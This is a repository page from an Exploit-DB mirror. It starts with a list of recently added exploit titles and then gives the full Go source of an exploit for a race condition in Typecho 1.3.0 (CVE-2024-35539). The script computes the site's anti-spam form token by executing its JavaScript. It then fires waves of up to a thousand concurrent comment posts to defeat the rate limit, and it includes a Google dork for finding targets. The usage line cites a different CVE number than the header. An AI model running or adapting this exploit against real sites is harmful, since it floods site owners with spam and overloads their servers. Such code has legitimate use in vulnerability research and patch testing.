bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52161.go
Exploit-DB 60175c9963 DB: 2025-04-14 
52 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

DataEase 2.4.0 - Database Configuration Information Exposure

Cosy+ firmware 21.2s7 - Command Injection

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 - File Disclosure
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

CyberPanel 2.3.6 - Remote Code Execution (RCE)

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

MagnusSolution magnusbilling 7.3.0 - Command Injection

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Watcharr 1.43.0 - Remote Code Execution (RCE)

Webmin Usermin 2.100 - Username Enumeration
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

Artica Proxy 4.50 - Remote Code Execution (RCE)

Centron 19.04 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Feng Office 3.11.1.2 - SQL Injection
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

Litespeed Cache 6.5.0.1 - Authentication Bypass

MiniCMS 1.1 - Cross Site Scripting (XSS)

MoziloCMS 3.0 - Remote Code Execution (RCE)

NEWS-BUZZ News Management System 1.0 - SQL Injection

PandoraFMS 7.0NG.772 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
2025-04-14 00:16:26 +00:00

182 lines
No EOL
4.6 KiB
Go
Executable file
Raw Blame History

# Exploit Title: Typecho 1.3.0 - Race Condition
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35539
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main
import (
"bytes"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/robertkrimen/otto"
)
var (
c int32 = 0
commentsPostInterval int64 = 60
maxThreads int = 1000
wg sync.WaitGroup
userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
client *http.Client = &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
)
func getJSFunction(u string) string {
req, err := http.NewRequest("GET", u, nil)
if err != nil {
fmt.Println("[X] Error creating initial request:", err)
return ""
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending initial request:", err)
return ""
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
fmt.Println("[X] Error finding JavaScript function")
return ""
}
jsFunction := strings.Split(body, "input.value = (")[1]
jsFunction = strings.Split(jsFunction, ")();;")[0]
return jsFunction
}
func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
vm := otto.New()
_, err := vm.Run(jsFunctionBody)
if err != nil {
fmt.Println("[X] Error executing JavaScript function:", err)
return ""
}
result, err := vm.Call(jsFunctionName, nil)
if err != nil {
fmt.Println("[X] Error calling JavaScript function:", err)
return ""
}
returnValue, err := result.ToString()
if err != nil {
fmt.Println("[X] Error converting JavaScript result to string:", err)
return ""
}
return returnValue
}
func spamComments(u string, formToken string) {
timestamp := time.Now().Unix()
for {
i := 0
for time.Now().Unix() < timestamp-1 {
time.Sleep(250 * time.Millisecond)
fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1)
}
fmt.Printf("\n")
for time.Now().Unix() < timestamp+2 {
if i < maxThreads {
wg.Add(1)
go spamRequest(u, formToken, i)
i++
}
}
wg.Wait()
fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
timestamp = time.Now().Unix() + commentsPostInterval
}
}
func spamRequest(u string, formToken string, i int) {
fmt.Printf("\r[*] Spamming comment request %d ", i)
defer wg.Done()
formData := url.Values{}
formData.Set("_", formToken)
formData.Set("author", fmt.Sprintf("user_%d", i))
formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
req, err := http.NewRequest("POST", u+"comment", nil)
if err != nil {
return
}
req.Header.Set("Referer", u)
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
resp, err := client.Do(req)
if err != nil {
return
}
if resp.StatusCode == 302 {
atomic.AddInt32(&c, 1)
}
defer resp.Body.Close()
}
func main() {
if len(os.Args) != 2 {
fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
return
}
fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
targetUrl := os.Args[1]
fmt.Println("[+] Spam target:", targetUrl)
fmt.Println("[*] Getting JavaScript function to calculate form token...")
jsFunction := getJSFunction(targetUrl)
if jsFunction == "" {
fmt.Println("[-] Could not get JavaScript function, exiting...")
return
}
fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
if formToken == "" {
fmt.Println("[-] Could not get form token, exiting...")
return
}
fmt.Printf("[+] Form token: %s", formToken)
spamComments(targetUrl, formToken)
}
Reference in a new issue View git blame Copy permalink